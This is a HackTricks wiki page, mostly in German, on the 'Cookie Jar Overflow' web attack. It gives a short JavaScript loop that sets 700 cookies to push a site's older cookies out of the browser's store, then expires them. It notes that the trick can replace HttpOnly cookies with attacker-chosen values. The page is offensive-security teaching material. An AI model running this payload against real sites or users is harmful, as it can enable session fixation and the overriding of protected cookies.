Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Die Browser haben ein Limit für die Anzahl der Cookies, die sie für eine Seite speichern können. Wenn Sie aus irgendeinem Grund ein Cookie verschwinden lassen müssen, können Sie das Cookie-Glas überlaufen, da die ältesten zuerst gelöscht werden:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Beachten Sie, dass Cookies von Drittanbietern, die auf eine andere Domain verweisen, nicht überschrieben werden.

Dieser Angriff kann auch verwendet werden, um HttpOnly-Cookies zu überschreiben, da Sie es löschen und dann mit dem gewünschten Wert zurücksetzen können.

Überprüfen Sie dies in diesem Beitrag mit einem Labor.

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

PreviousCookie Tossing NextCookie Bomb

Last updated 4 months ago